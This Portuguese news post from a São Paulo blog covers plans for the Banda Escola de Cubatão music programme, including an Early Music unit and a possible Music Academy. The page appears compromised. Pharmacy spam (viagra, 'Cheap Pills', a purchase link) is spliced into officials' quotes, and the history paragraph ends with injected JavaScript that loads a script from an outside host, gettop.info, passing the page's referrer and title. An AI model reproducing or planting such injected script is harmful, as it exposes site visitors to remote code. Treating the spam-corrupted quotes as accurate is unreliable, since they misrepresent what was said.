NotíciaSão Paulo

Banda Escola de Cubatão

 Vai ter núcleo de Música Antiga e pode se tornar Academia de Música.


Modificações no Programa Banda Escola de Cubatão, BEC, foram anunciadas em reunião na Secretaria de Cultura da cidade. Entre as ações previstas para este ano estão a implantação de um Núcleo para ensino da Música Antiga e a possível transformação do Programa em Academia de Música.

O maestro Roberto Farias, coordenador dos Grupos, explica que o objetivo do BEC é a formação de estudantes para suprir os Corpos Estáveis. A criação do Núcleo de Música Antiga, além de uma antiga reivindicação de professores e alunos, é uma maneira de preparar os jovens músicos para, posteriormente integrarem o Grupo Rinascita.

Atualmente, apenas escolas da capital paulista oferecem aulas de Música Antiga, obras criadas nos períodos medieval, renascentista e barroco. “A Música Antiga é um trabalho de muita pesquisa. Atualmente há apenas academias na Capital que oferecem aulas desse tipo. A implantação desse núcleo no BEC é uma ferramenta de capacitação para os alunos”, disse. O projeto deve ser coordenado por Fabrício Leite, integrante do Rinascita.

Outra mudança, que deve acontecer futuramente, é a transformação do Programa em Academia de Música, o que ajudaria a fixar essa nova consciência de formação musical. Cheap Pills “Queremos que o BEC continue sendo um programa de excelência, o que vai refletir diretamente na formação dos Grupos Artísticos”, comentou o secretário de Cultura, Welington Borges.

O novo coordenador do Programa, Germano Blume, destaca a importância desse caráter de formação do BEC: “ viagra for sale in northern ireland generic name for decadron Purchase http://www.fictionplanefanclub.com/2018/02/buy-menosan-menopause/ Sabemos que nem todos os estudantes se tornarão profissionais futuramente, mas haverá, no mínimo a formação de uma plateia de qualidade, já que esses mesmos alunos passarão a apreciar a música com um olhar diferenciado purchase precose cost Pills ”. Germano participou desta primeira reunião juntamente com Leonardo Corassari, coordenador de Atividades do Bec e de Ulysses Damacena, coordenador de Práticas de Conjunto.

O Programa Banda Escola de Cubatão funciona sem parar desde 2002, com este nome. Antes disso já foi Banda das Escolas Estaduais de Cubatão e, depois, Banda Experimental de Cubatão.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.